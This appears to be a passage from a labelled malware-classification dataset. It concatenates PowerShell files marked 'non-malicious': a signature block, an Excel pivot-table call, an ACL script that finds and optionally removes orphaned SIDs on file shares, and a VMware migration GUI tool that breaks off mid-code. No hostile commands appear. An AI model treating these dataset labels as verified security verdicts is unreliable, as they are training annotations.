# 18FBzq2rdosggNQtlQeNx/ULFx6a5daZaVHHTqadKW/neZMNMmNTrszGKYogwWDG
# 8gIsxPnIIt/5J4Khg1HCvMmCGiGEspe81K9EHJaCIpUqhVSu8f0+SXR0/I6uP6Vy
# 9MNaAapQpYt2lRtm6+/a35Qu2RrrTCd9TAX3+CNdxFfIJgV6/IEjX1QJOCpi1arK
# 3+3PU6sf9kSc1ZlZxVZkW/eOUg9m/Jg/RAYTZG7p4RVgUKWx7M+46MkLvsWE990K
# ndq8KWw9Vu2/eGe2W8heFBy5r4Qtd6L3OZU3b05/HMY8BNYxxX7vPehRfnGtJHQb
# LNz5fKrvwnZJaGLVi/UD3759jg82dUZbk3bEg+6CviyuNxLxvFbD5K1Dw7dmll6U
# Mvqg9quJUPrOoPMIgRrRRKfM97gxAgMBAAGjggF4MIIBdDAfBgNVHSMEGDAWgBQa
# ofhhGSAPw0F3RSiO0TVfBhIEVTAdBgNVHQ4EFgQUaXU3e7udNUJOv1fTmtufAdGu
# 3tAwDgYDVR0PAQH/BAQDAgbAMAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYI
# KwYBBQUHAwgwQAYDVR0gBDkwNzA1BgwrBgEEAbIxAQIBAwgwJTAjBggrBgEFBQcC
# ARYXaHR0cHM6Ly9zZWN0aWdvLmNvbS9DUFMwRAYDVR0fBD0wOzA5oDegNYYzaHR0
# cDovL2NybC5zZWN0aWdvLmNvbS9TZWN0aWdvUlNBVGltZVN0YW1waW5nQ0EuY3Js
# MHQGCCsGAQUFBwEBBGgwZjA/BggrBgEFBQcwAoYzaHR0cDovL2NydC5zZWN0aWdv
# LmNvbS9TZWN0aWdvUlNBVGltZVN0YW1waW5nQ0EuY3J0MCMGCCsGAQUFBzABhhdo
# dHRwOi8vb2NzcC5zZWN0aWdvLmNvbTANBgkqhkiG9w0BAQwFAAOCAgEASgN4kEIz
# 7Hsagwk2M5hVu51ABjBrRWrxlA4ZUP9bJV474TnEW7rplZA3N73f+2Ts5YK3lcxX
# VXBLTvSoh90ihaZXu7ghJ9SgKjGUigchnoq9pxr1AhXLRFCZjOw+ugN3poICkMIu
# k6m+ITR1Y7ngLQ/PATfLjaL6uFqarqF6nhOTGVWPCZAu3+qIFxbradbhJb1FCJeA
# 11QgKE/Ke7OzpdIAsGA0ZcTjxcOl5LqFqnpp23WkPnlomjaLQ6421GFyPA6FYg2g
# XnDbZC8Bx8GhxySUo7I8brJeotD6qNG4JRwW5sDVf2gaxGUpNSotiLzqrnTWgufA
# iLjhT3jwXMrAQFzCn9UyHCzaPKw29wZSmqNAMBewKRaZyaq3iEn36AslM7U/ba+f
# XwpW3xKxw+7OkXfoIBPpXCTH6kQLSuYThBxN6w21uIagMKeLoZ+0LMzAFiPJkeVC
# A0uAzuRN5ioBPsBehaAkoRdA1dvb55gQpPHqGRuAVPpHieiYgal1wA7f0GiUeaGg
# no62t0Jmy9nZay9N2N4+Mh4g5OycTUKNncczmYI3RNQmKSZAjngvue76L/Hxj/5Q
# uHjdFJbeHA5wsCqFarFsaOkq5BArbiH903ydN+QqBtbD8ddo408HeYEIE/6yZF7p
# sTzm0Hgjsgks4iZivzupl1HMx0QygbKvz98wggbsMIIE1KADAgECAhAwD2+s3WaY
# dHypRjaneC25MA0GCSqGSIb3DQEBDAUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE
# CBMKTmV3IEplcnNleTEUMBIGA1UEBxMLSmVyc2V5IENpdHkxHjAcBgNVBAoTFVRo
# ZSBVU0VSVFJVU1QgTmV0d29yazEuMCwGA1UEAxMlVVNFUlRydXN0IFJTQSBDZXJ0
# aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xOTA1MDIwMDAwMDBaFw0zODAxMTgyMzU5
# NTlaMH0xCzAJBgNVBAYTAkdCMRswGQYDVQQIExJHcmVhdGVyIE1hbmNoZXN0ZXIx
# EDAOBgNVBAcTB1NhbGZvcmQxGDAWBgNVBAoTD1NlY3RpZ28gTGltaXRlZDElMCMG
# A1UEAxMcU2VjdGlnbyBSU0EgVGltZSBTdGFtcGluZyBDQTCCAiIwDQYJKoZIhvcN
# AQEBBQADggIPADCCAgoCggIBAMgbAa/ZLH6ImX0BmD8gkL2cgCFUk7nPoD5T77Na
# wHbWGgSlzkeDtevEzEk0y/NFZbn5p2QWJgn71TJSeS7JY8ITm7aGPwEFkmZvIavV
# cRB5h/RGKs3EWsnb111JTXJWD9zJ41OYOioe/M5YSdO/8zm7uaQjQqzQFcN/nqJc
# 1zjxFrJw06PE37PFcqwuCnf8DZRSt/wflXMkPQEovA8NT7ORAY5unSd1VdEXOzQh
# e5cBlK9/gM/REQpXhMl/VuC9RpyCvpSdv7QgsGB+uE31DT/b0OqFjIpWcdEtlEzI
# jDzTFKKcvSb/01Mgx2Bpm1gKVPQF5/0xrPnIhRfHuCkZpCkvRuPd25Ffnz82Pg4w
# ZytGtzWvlr7aTGDMqLufDRTUGMQwmHSCIc9iVrUhcxIe/arKCFiHd6QV6xlV/9A5
# VC0m7kUaOm/N14Tw1/AoxU9kgwLU++Le8bwCKPRt2ieKBtKWh97oaw7wW33pdmmT
# IBxKlyx3GSuTlZicl57rjsF4VsZEJd8GEpoGLZ8DXv2DolNnyrH6jaFkyYiSWcuo
# RsDJ8qb/fVfbEnb6ikEk1Bv8cqUUotStQxykSYtBORQDHin6G6UirqXDTYLQjdpr
# t9v3GEBXc/Bxo/tKfUU2wfeNgvq5yQ1TgH36tjlYMu9vGFCJ10+dM70atZ2h3pVB
# eqeDAgMBAAGjggFaMIIBVjAfBgNVHSMEGDAWgBRTeb9aqitKz1SA4dibwJ3ysgNm
# yzAdBgNVHQ4EFgQUGqH4YRkgD8NBd0UojtE1XwYSBFUwDgYDVR0PAQH/BAQDAgGG
# MBIGA1UdEwEB/wQIMAYBAf8CAQAwEwYDVR0lBAwwCgYIKwYBBQUHAwgwEQYDVR0g
# BAowCDAGBgRVHSAAMFAGA1UdHwRJMEcwRaBDoEGGP2h0dHA6Ly9jcmwudXNlcnRy
# dXN0LmNvbS9VU0VSVHJ1c3RSU0FDZXJ0aWZpY2F0aW9uQXV0aG9yaXR5LmNybDB2
# BggrBgEFBQcBAQRqMGgwPwYIKwYBBQUHMAKGM2h0dHA6Ly9jcnQudXNlcnRydXN0
# LmNvbS9VU0VSVHJ1c3RSU0FBZGRUcnVzdENBLmNydDAlBggrBgEFBQcwAYYZaHR0
# cDovL29jc3AudXNlcnRydXN0LmNvbTANBgkqhkiG9w0BAQwFAAOCAgEAbVSBpTNd
# FuG1U4GRdd8DejILLSWEEbKw2yp9KgX1vDsn9FqguUlZkClsYcu1UNviffmfAO9A
# w63T4uRW+VhBz/FC5RB9/7B0H4/GXAn5M17qoBwmWFzztBEP1dXD4rzVWHi/SHbh
# RGdtj7BDEA+N5Pk4Yr8TAcWFo0zFzLJTMJWk1vSWVgi4zVx/AZa+clJqO0I3fBZ4
# OZOTlJux3LJtQW1nzclvkD1/RXLBGyPWwlWEZuSzxWYG9vPWS16toytCiiGS/qhv
# WiVwYoFzY16gu9jc10rTPa+DBjgSHSSHLeT8AtY+dwS8BDa153fLnC6NIxi5o8JH
# HfBd1qFzVwVomqfJN2Udvuq82EKDQwWli6YJ/9GhlKZOqj0J9QVst9JkWtgqIsJL
# nfE5XkzeSD2bNJaaCV+O/fexUpHOP4n2HKG1qXUfcb9bQ11lPVCBbqvw0NP8srMf
# tpmWJvQ8eYtcZMzN7iea5aDADHKHwW5NWtMe6vBE5jJvHOsXTpTDeGUgOw9Bqh/p
# oUGd/rG4oGUqNODeqPk85sEwu8CgYyz8XBYAqNDEf+oRnR4GxqZtMl20OAkrSQeq
# /eww2vGnL8+3/frQo4TZJ577AWZ3uVYQ4SBuxq6x+ba6yDVdM3aO8XwgDCp3rrWi
# Aoa6Ke60WgCxjKvj+QrJVF3UuWp0nr1IrpgxggQtMIIEKQIBATCBkjB9MQswCQYD
# VQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdT
# YWxmb3JkMRgwFgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJTAjBgNVBAMTHFNlY3Rp
# Z28gUlNBIFRpbWUgU3RhbXBpbmcgQ0ECEQCMd6AAj/TRsMY9nzpIg41rMA0GCWCG
# SAFlAwQCAgUAoIIBazAaBgkqhkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQwHAYJKoZI
# hvcNAQkFMQ8XDTIxMTAyNzEyMTAxNlowPwYJKoZIhvcNAQkEMTIEMEi3FAjfTnFT
# 5bPosmVdZNOI/ixIXL78SGuAXDsfezpE1hvbQGde8CtjZlTsvDqmpzCB7QYLKoZI
# hvcNAQkQAgwxgd0wgdowgdcwFgQUlRE3EB2ILzG9UT+UmtpMaK2MCPUwgbwEFALW
# W5Xig3DBVwCV+oj5I92Tf62PMIGjMIGOpIGLMIGIMQswCQYDVQQGEwJVUzETMBEG
# A1UECBMKTmV3IEplcnNleTEUMBIGA1UEBxMLSmVyc2V5IENpdHkxHjAcBgNVBAoT
# FVRoZSBVU0VSVFJVU1QgTmV0d29yazEuMCwGA1UEAxMlVVNFUlRydXN0IFJTQSBD
# ZXJ0aWZpY2F0aW9uIEF1dGhvcml0eQIQMA9vrN1mmHR8qUY2p3gtuTANBgkqhkiG
# 9w0BAQEFAASCAgA/BbfH6gAvgfrjmIi0VW+bl/wZxXSngbM1hBXElXjECzzf+uSM
# p/mA8Dy1UEw7Ecq43CW43kd2lPO/Qp4B7AUc0GzyvW18w0d9yYZ0cnDQRk8zeDO2
# +bvyjDwTutnb4sw2iMX/plusn6JyCZnzsyFJSXH45L69zKKjiJLptZXM+78N27Sh
# oo1HBjVZcLqm/uatJWVQLTWgMvC/zFu9hT0TVFlvKsNtJVMOV5UUOBpqsPd/vLD8
# LmLyZj5rQ9fnYUWmAyx6W4HTGCherxHJBEGrHPIc8xks25wsnIsr+QGB9d0nq9DY
# 0ySxVa93AxNyybxR/fIrO2fg942xRphkjxL3PQ/vdG0LAR3rkqUO4Emlg6KodflN
# 7slnl+yKbdcYS6NUcd23xxh5sri7RI9dJ8chXenxNC4cEtUV7CTC/V8F/YciFxFV
# u6Pur25E1ZqvZxenWylO77UZQ5hIVYtehr5ereJ6rhXh4jOQnf83cjXWX0HDkdq2
# XpLzbB1NywDefKL+dnOVimZy0An7DOIR15fxynIfyAmJWMZtFOQ9QOYnRXzj+wNY
# WXjhWttByutrLg/w/SovWg6htuwddcoUUgYhsQg+SauY+SM7seBpL2MVVuWYPUFJ
# I+hlJkzNJ3d64sL7sI9qlbxhrBJOadG7HKnaeM9tnA7TB36QK335suEGTw==
# SIG # End signature block
|
combined_dataset/train/non-malicious/2549.ps1
|
2549.ps1
|
cls
$people = Import-Csv .\people.csv |
select Dept, Name, @{
n="Salary"
e={[double]$_.Salary}
}, @{
n="YearsEmployeed"
e={[int]$_.yearsEmployeed}
}
$people | .\Out-ExcelPivotTable
$people | .\Out-ExcelPivotTable name dept salary
$people | .\Out-ExcelPivotTable -values YearsEmployeed
|
combined_dataset/train/non-malicious/8097adfd-db82-4ae1-8996-c504851508d5.ps1
|
8097adfd-db82-4ae1-8996-c504851508d5.ps1
|
#==========================================================================
# NAME: getunknownsids.ps1
#
# AUTHOR: Stephen Wheet
# Version: 4.0
# Date: 6/11/10
#
# COMMENT:
# This script was created to find unknown SIDs or old domain permissions
# on folders. It ignores folders where inheirtance is turned on.
#
# This works on NETAPPS and WINDOWS servers. You will need the DLL's
#
# Version 2: completely changed the query method and ACL removal
# Version 3: Added ability to query AD for servers, and handles getting
# getting shares automatically from:
# NETAPP FILERS
# Windows servers
# Version 4: Cleaned up folder checking and added checking for local
# account checking so we could ignore.
#
#==========================================================================
Function checkshare {
Param($PassedShareName)
Process
{
$path = "\\\\$serverFQDN\\$PassedShareName"
$filename = $path.Replace("\\","-") + ".csv"
#Place Headers on out-put file
$list = "Task,Path,Access Entity,"
$list | format-table | Out-File "c:\\reports\\unknownsids\\$filename"
#Populate Folders Array
Write-Host "Writing results to : $filename"
$date = Get-Date
Write-Host $date
Write-Host "Getting Folders in: $Path"
#PSIscontainer means folders only
[Array] $folders = Get-ChildItem -path $path -recurse | ? {$_.PSIsContainer}
#Process data in array
ForEach ($folder in [Array] $folders)
{
#Check to see if there are any folders
If ($folder.pspath){
#Convert Powershell Provider Folder Path to standard folder path
$PSPath = (Convert-Path $folder.pspath)
Write-Host "Checking Dir: $PSPath"
#Check to make sure valid
If ($PSPath){
#Get the ACL's from each folder
$error.clear()
$acl = Get-Acl -Path $PSPath
#Write log if no access
if (!$?) {
$errmsg = "Error,$PSPath,ACCESS DENIED"
$errmsg | format-table | Out-File -append "$filename"
} #end IF
$ACL.Access |
?{!$_.IsInherited} |
?{ $_.IdentityReference -like $unknownsid -or $_.IdentityReference -like $olddomain } |
% {$value = $_.IdentityReference.Value
#Check for Local account
$localsid = 0
If ($value -like $unknownsid){
$checkforlocal = $value.split("-")
$total =$checkforlocal.count -1
if ($checkforlocal[$total] -match "^100.$" -or $checkforlocal[$total] -match "^500"){
$localsid = 1
# You can uncomment the below if you want to report on local accounts.
#$list = ("Local,$PSPath,$value")
#$list | format-table | Out-File -append "$filename"
} #end IF
} #end IF
If (!$localsid){
Write-host "Found - $PSPath - $value"
$list = ("Found,$PSPath,$value")
$list | format-table | Out-File -append "$filename"
#Remove Bad SID
if ($removeacl) { $ACL.RemoveAccessRuleSpecific($_)
Write-host "Deleting - $PSPath - $value"
$list = ("Deleting,$PSPath,$value")
$list | format-table | Out-File -append "$filename"
}#end IF
if ($removeacl -and $value) {
$date = Get-Date
Write-Host $date
Write-host "Setting - $PSPath"
$list = ("Setting,$PSPath")
$list | format-table | Out-File -append "$filename"
Set-ACL $PSpath $ACL
$value = ""
} #end IF
} #end if
} #end foreachobj
} #end if
} #end if
} #end ForEach
}#end Process
} #end function
get-pssnapin -registered | add-pssnapin -passthru
[void][Reflection.Assembly]::LoadFile('C:\\reports\\ManageOntap.dll') #Need this DLL from netapp 3.5SDK
$ReqVersion = [version]"1.2.2.1254"
$QadVersion = (Get-PSSnapin Quest.ActiveRoles.ADManagement).Version #Need Quest plugins installed
if($QadVersion -lt $ReqVersion) {
throw "Quest AD cmdlets version '$ReqVersion' is required. Please download the latest version"
} #end If
#Set variables
$value = ""
$unknownsid = "*S-1-5-21-*" #Broken SID Verify the Broken SID number on your system and replace
$olddomain = "Domain.local*" #Old w2k/nt4 domain
$ErrorActionPreference = "SilentlyContinue"
$removeacl = 0 #change to 1 if you want to remove the SID, 0 for only logging
$localsid = 0
#Get all the servers from the specified OU
$Servers = get-QADComputer -SearchRoot 'domain.local/ou/Server' # change the container.
Foreach ($server in $Servers ) {
$serverFQDN = $server.dnsname
write-host $serverFQDN
#Test ping server to make sure it's up before querying it
$ping = new-object System.Net.NetworkInformation.Ping
$Reply = $ping.Send($serverFQDN)
if ($Reply.status -eq "Success"){
Write-Host "Online"
#Check for Netapp .. if found get the shares differently
If ($serverFQDN -like "*netapp*"){
$server = new-object netapp.manage.naserver($serverFQDN,1,0)
#pass authentication
$server.Style = "RPC"
# Issue command to get the shares
$NaElement = New-Object NetApp.Manage.NaElement("system-cli")
$arg = New-Object NetApp.Manage.NaElement("args")
$arg.AddNewChild('arg','cifs')
$arg.AddNewChild('arg','shares')
$NaElement.AddChildElement($arg)
$CifsString = $server.InvokeElem($NaElement).GetChildContent("cli-output")
# Split the returned txt up .. the $null makes it skip a line
$null,$null,$Lines = $CifsString.Split("`n")
Foreach ($line in $Lines ) {
# Had to trick it so skip the line with permissions, then exclude ETC$ adn c$
if (!$line.startswith(" ") -and $line -notlike "*Etc$*" -and $line -notlike "*C$*"){
$l= $line.Split(" ")
checkshare -PassedShareName $l[0] #Pass share to function
} #end if
} #end foreach
} #end if
Else{ #Else if a Windows server query via WMI
Get-WMIObject Win32_Share -Computer $serverFQDN |
where {$_.Name -like "*$*" -and $_.Name -notlike "*ADMIN*" -and $_.Name -notlike "*IPC*" -and $_.Name -notlike "*lib*"} |
%{
#Set path
$sharename = $_.name
checkshare -PassedShareName $sharename #Pass share to function
} #end ForEachObj
} #End Else
} #End If
} #end ForEach
|
combined_dataset/train/non-malicious/Easy Migration Tool v_2.1.ps1
|
Easy Migration Tool v_2.1.ps1
|
#Generated Form Function
function GenerateForm {
########################################################################
# Code Generated By: Richard Yaw
# Generated On: 07/12/2011
#
# Easy Migration Script for VMware (Version 2.0)
# - Added a "Reload Tasks" feature.
# - Fixed issue with the Undo feature for SVMotions.
# - Added snapshot check before doing SVMotions.
# - Added ability to VMotion VMs between clusters.
#
# Easy Migration Script for VMware (Version 3.0)
# - Added ability to run multiple migrations concurrently.
# - The UI is no longer locked during a migration.
#
# Easy Migration Script for VMware (Version 3.1)
# - Changed GUI to make it bigger on the screen.
# - When doing a Host to Host migration, you can now drill down a host to list the VMs on it.
#############################################################################################
#region Import the Assemblies
[reflection.assembly]::loadwithpartialname("System.Drawing") | Out-Null
[reflection.assembly]::loadwithpartialname("System.Windows.Forms") | Out-Null
#endregion
#region Generated Form Objects
$MigrationForm = New-Object System.Windows.Forms.Form
$Header = new-object System.Windows.Forms.Label
$MigrateButton = New-Object System.Windows.Forms.Button
$ClusterComboBox = New-Object System.Windows.Forms.ComboBox
$SourceHostListBox = New-Object System.Windows.Forms.ListBox
$SourceDBListBox = New-Object System.Windows.Forms.CheckedListBox
$SourceVMListBox = New-Object System.Windows.Forms.CheckedListBox
$DestinationListBox = New-Object System.Windows.Forms.ListBox
$vCenterLabel = New-Object System.Windows.Forms.Label
$VCComboBox = New-Object System.Windows.Forms.ComboBox
$LoginButton = New-Object System.Windows.Forms.Button
$ClearMsgButton = New-Object System.Windows.Forms.Button
$UndoButton = New-Object System.Windows.Forms.Button
$UndoALLButton = New-Object System.Windows.Forms.Button
$ReloadTaskButton = New-Object System.Windows.Forms.Button
$SaveTaskButton = New-Object System.Windows.Forms.Button
$ClusterLabel = New-Object System.Windows.Forms.Label
$HostToHostButton = New-Object System.Windows.Forms.Button
$VMToHostButton = New-Object System.Windows.Forms.Button
$DBtoDBButton = New-Object System.Windows.Forms.Button
$VMtoDBButton = New-Object System.Windows.Forms.Button
$AllClustersCheckbox = New-Object System.Windows.Forms.CheckBox
$SourceButton = New-Object System.Windows.Forms.Button
$DestinationButton = New-Object System.Windows.Forms.Button
$FindVMLabel = New-Object System.Windows.Forms.Label
$FindVMTxtBox = New-Object System.Windows.Forms.TextBox
$FindVMBtn = New-Object System.Windows.Forms.Button
$ResetFindVMBtn = New-Object System.Windows.Forms.Button
$ResetButton = New-Object System.Windows.Forms.Button
$ChangeVCButton = New-Object System.Windows.Forms.Button
$CloseButton = New-Object System.Windows.Forms.Button
$MessagesLabel = New-Object System.Windows.Forms.Label
$MessagesListBox = New-Object System.Windows.Forms.ListBox
$TaskLabel = New-Object System.Windows.Forms.Label
$TaskListBox = New-Object System.Windows.Forms.ListBox
$InitialFormWindowState = New-Object System.Windows.Forms.FormWindowState
#endregion Generated Form Objects
#----------------------------------------------
#Generated Event Script Blocks
#----------------------------------------------
#Provide Custom Code for events specified in PrimalForms.
$LoginButton_Click=
{
#TODO: Place custom script here
If ((Get-PSSnapin "VMware.VimAutomation.Core" -ErrorAction SilentlyContinue) -eq $null) {
Add-PSSnapin "VMware.VimAutomation.Core"
}
If($VCComboBox.SelectedItem -eq $null)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show("Please select a vCenter Server.")
}
Else
{
#Connect to vCenter
$vCenterName = $VCComboBox.SelectedItem.ToString()
Connect-VIServer $vCenterName -ErrorAction SilentlyContinue
If (!$?)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show($($error[0]))
}
Else
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show("You are now connected to $vCenterName. Please select a cluster from the drop-down box.")
$ClusterComboBox.Enabled = $true
#Get Cluster
$ClusterNames = Get-View -ViewType ClusterComputeResource | %{$_.Name}
foreach($ClusterName in $ClusterNames)
{
$ClusterComboBox.Items.add($ClusterName)
}
$LoginButton.Enabled = $false
$VCComboBox.Enabled = $false
$HostToHostButton.Enabled = $true
$VMToHostButton.Enabled = $true
$DBtoDBButton.Enabled = $true
$VMtoDBButton.Enabled = $true
$ResetButton.Enabled = $true
$ChangeVCButton.Enabled = $true
$ReloadTaskButton.Enabled = $true
$OnLoadForm_StateCorrection=
{#Correct the initial state of the form to prevent the .Net maximized form issue
$MigrationForm.WindowState = $InitialFormWindowState
}
}
}
}
$HostToHostButton_Click=
{
#TODO: Place custom script here
$ClusterName = $ClusterComboBox.SelectedItem
If ($ClusterName -eq $null)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('Please Select a Cluster.')
}
Else
{
$SourceHostListBox.Enabled = $true
$SourceHostListBox.Items.Clear()
#Get Hostnames in a Cluster
Get-Cluster -Name $ClusterName | Get-VMHost | % { [void]$SourceHostListBox.items.add($_.Name) }
$ClusterComboBox.Enabled = $false
$HostToHostButton.Enabled = $false
$VMToHostButton.Enabled = $false
$DBtoDBButton.Enabled = $false
$VMtoDBButton.Enabled = $false
$SourceButton.Text = 'Source - Select One Host'
$DestinationButton.Text = 'Destination Host'
$SourceButton.Enabled = $true
$HostToHostButton.BackColor = [System.Drawing.Color]::lightblue
$OnLoadForm_StateCorrection=
{#Correct the initial state of the form to prevent the .Net maximized form issue
$MigrationForm.WindowState = $InitialFormWindowState
}
}
}
$VMToHostButton_Click=
{
#TODO: Place custom script here
$ClusterName = $ClusterComboBox.SelectedItem
If ($ClusterName -eq $null)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('Please Select a Cluster.')
}
Else
{
$MigrationForm.Controls.Remove($SourceHostListBox)
$MigrationForm.Controls.Add($SourceVMListBox)
$SourceVMListBox.Enabled = $true
$SourceVMListBox.Items.Clear()
#Get VMs in a Cluster
Get-Cluster -Name $ClusterName | Get-VM | % { [void]$SourceVMListBox.items.add($_.Name) }
$ClusterComboBox.Enabled = $false
$HostToHostButton.Enabled = $false
$VMToHostButton.Enabled = $false
$DBtoDBButton.Enabled = $false
$VMtoDBButton.Enabled = $false
$SourceButton.Text = 'Source - Select VMs'
$DestinationButton.Text = 'Destination Host'
$SourceButton.Enabled = $true
$FindVMTxtBox.Enabled = $true
$FindVMBtn.Enabled = $true
$ResetFindVMBtn.Enabled = $true
$VMToHostButton.BackColor = [System.Drawing.Color]::lightblue
$OnLoadForm_StateCorrection=
{#Correct the initial state of the form to prevent the .Net maximized form issue
$MigrationForm.WindowState = $InitialFormWindowState
}
}
}
$DBtoDBButton_Click=
{
#TODO: Place custom script here
$ClusterName = $ClusterComboBox.SelectedItem
If ($ClusterName -eq $null)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('Please Select a Cluster.')
}
Else
{
$MigrationForm.Controls.Remove($SourceHostListBox)
$MigrationForm.Controls.Add($SourceDBListBox)
$SourceDBListBox.Enabled = $true
$SourceDBListBox.Items.Clear()
#Get Datastores in a Cluster
Get-Cluster -Name $ClusterName | Get-VMHost | Get-Datastore | Where-Object {$_.Name -notlike "*SCR01"} | Where-Object {$_.Name -notlike "DAS*"} | % { [void]$SourceDBListBox.items.add($_.Name) }
$ClusterComboBox.Enabled = $false
$HostToHostButton.Enabled = $false
$VMToHostButton.Enabled = $false
$DBtoDBButton.Enabled = $false
$VMtoDBButton.Enabled = $false
$SourceButton.Text = 'Source - Select a Datastore'
$DestinationButton.Text = 'Destination Datastore'
$SourceButton.Enabled = $true
$DBtoDBButton.BackColor = [System.Drawing.Color]::lightblue
$OnLoadForm_StateCorrection=
{#Correct the initial state of the form to prevent the .Net maximized form issue
$MigrationForm.WindowState = $InitialFormWindowState
}
}
}
$VMToDBButton_Click=
{
#TODO: Place custom script here
$ClusterName = $ClusterComboBox.SelectedItem
If ($ClusterName -eq $null)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('Please Select a Cluster.')
}
Else
{
$MigrationForm.Controls.Remove($SourceHostListBox)
$MigrationForm.Controls.Add($SourceVMListBox)
$SourceVMListBox.Enabled = $true
$SourceVMListBox.Items.Clear()
#Get VMs in a Cluster
Get-Cluster -Name $ClusterName | Get-VM | % { [void]$SourceVMListBox.items.add($_.Name) }
$ClusterComboBox.Enabled = $false
$HostToHostButton.Enabled = $false
$VMToHostButton.Enabled = $false
$DBtoDBButton.Enabled = $false
$VMtoDBButton.Enabled = $false
$SourceButton.Text = 'Source - Select VMs'
$DestinationButton.Text = 'Destination Datastore'
$SourceButton.Enabled = $true
$FindVMTxtBox.Enabled = $true
$FindVMBtn.Enabled = $true
$ResetFindVMBtn.Enabled = $true
$VMtoDBButton.BackColor = [System.Drawing.Color]::lightblue
$OnLoadForm_StateCorrection=
{#Correct the initial state of the form to prevent the .Net maximized form issue
$MigrationForm.WindowState = $InitialFormWindowState
}
}
}
$SourceHostListBox_MouseDoubleClick=
{
#TODO: Place custom script here
$SourceHostname = $SourceHostListBox.SelectedItem
If ($SourceHostname -ne $null)
{
$MigrationForm.Controls.Remove($SourceHostListBox)
$MigrationForm.Controls.Add($SourceVMListBox)
$SourceVMListBox.Enabled = $true
$SourceVMListBox.Items.Clear()
Get-VMHost -name $SourceHostname | Get-VM | % { [void]$SourceVMListBox.items.add($_.Name) }
$SourceButton.Text = 'Source - Select VMs'
$DestinationButton.Text = 'Destination Host'
$FindVMTxtBox.Enabled = $true
$FindVMBtn.Enabled = $true
$ResetFindVMBtn.Enabled = $true
$OnLoadForm_StateCorrection=
{#Correct the initial state of the form to prevent the .Net maximized form issue
$MigrationForm.WindowState = $InitialFormWindowState
}
}
}
$SourceButton_OnClick=
{
#TODO: Place custom script here
$ClusterName = $ClusterComboBox.SelectedItem
If ($SourceButton.Text -eq "Source - Select One Host")
{
$SourceHostname = $SourceHostListBox.SelectedItem
If ($SourceHostname -eq $null)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('Please Select a Source Host.')
}
Else
{
#Get Hostnames in a Cluster
Get-Cluster -Name $ClusterName | Get-VMHost | Where-Object {$_.Name -notlike "$SourceHostname"} | % { [void]$DestinationListBox.items.add($_.Name) }
$SourceHostListBox.Enabled = $false
$SourceButton.Enabled = $false
$AllClustersCheckbox.Enabled = $true
$DestinationListBox.Enabled = $true
$DestinationButton.Enabled = $true
$OnLoadForm_StateCorrection=
{#Correct the initial state of the form to prevent the .Net maximized form issue
$MigrationForm.WindowState = $InitialFormWindowState
}
}
}
If ($SourceButton.Text -eq "Source - Select VMs")
{
$SourceVMname = $SourceVMListBox.SelectedItem
If ($SourceVMname -eq $null)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('Please Select One or More VMs.')
}
Else
{
if ($DestinationButton.Text -like "Destination Host")
{
#Get Hostnames in a Cluster
Get-Cluster -Name $ClusterName | Get-VMHost | % { [void]$DestinationListBox.items.add($_.Name) }
}
Else
{
#Get Datastores in a Cluster
Get-Cluster -Name $ClusterName | Get-VMHost | Get-Datastore | Where-Object {$_.Name -notlike "*SCR01"} | Where-Object {$_.Name -notlike "DAS*"} | % { [void]$DestinationListBox.items.add($_.Name) }
}
$DestinationListBox.Enabled = $true
$SourceVMListBox.Enabled = $false
$SourceButton.Enabled = $false
$AllClustersCheckbox.Enabled = $true
$DestinationButton.Enabled = $true
$OnLoadForm_StateCorrection=
{#Correct the initial state of the form to prevent the .Net maximized form issue
$MigrationForm.WindowState = $InitialFormWindowState
}
}
}
If ($SourceButton.Text -like "Source - Select a Datastore")
{
$SourceDBname = $SourceDBListBox.SelectedItem
If ($SourceDBname -eq $null)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('Please Select One Datastore.')
}
Else
{
#Get Datastores in a Cluster
Get-Cluster -Name $ClusterName | Get-VMHost | Get-Datastore | Where-Object {$_.Name -notlike "*SCR01"} | Where-Object {$_.Name -notlike "DAS*"} | Where-Object {$_.Name -notlike "$SourceDBname"} | % { [void]$DestinationListBox.items.add($_.Name) }
$SourceDBListBox.Enabled = $false
$SourceButton.Enabled = $false
$DestinationListBox.Enabled = $true
$DestinationButton.Enabled = $true
$OnLoadForm_StateCorrection=
{#Correct the initial state of the form to prevent the .Net maximized form issue
$MigrationForm.WindowState = $InitialFormWindowState
}
}
}
}
$AllClustersCheckbox_Click=
{
#TODO: Place custom script here
$DestinationListBox.Items.Clear()
#List the hosts in all the clusters
Get-VMHost | % { [void]$DestinationListBox.items.add($_.Name) }
$AllClustersCheckbox.Enabled = $False
}
$DestinationButton_OnClick=
{
#TODO: Place custom script here
$DestinationName = $DestinationListBox.SelectedItem
If ($DestinationName -eq $null)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('Please Select a Destination.')
}
Else
{
$AllClustersCheckbox.Enabled = $False
$DestinationListBox.Enabled = $False
$DestinationButton.Enabled = $False
$MigrateButton.Enabled = $True
$OnLoadForm_StateCorrection=
{#Correct the initial state of the form to prevent the .Net maximized form issue
$MigrationForm.WindowState = $InitialFormWindowState
}
}
}
$FindVMBtn_OnClick=
{
#TODO: Place custom script here
If($FindVMTxtBox.Text -ne "")
{
If($SourceVMListBox.CheckedItems.Count -eq 0)
{
$SourceVMListBox.Items.Clear()
}
Else
{
$CheckedVMs = @()
Foreach($VM in $SourceVMListBox.CheckedItems)
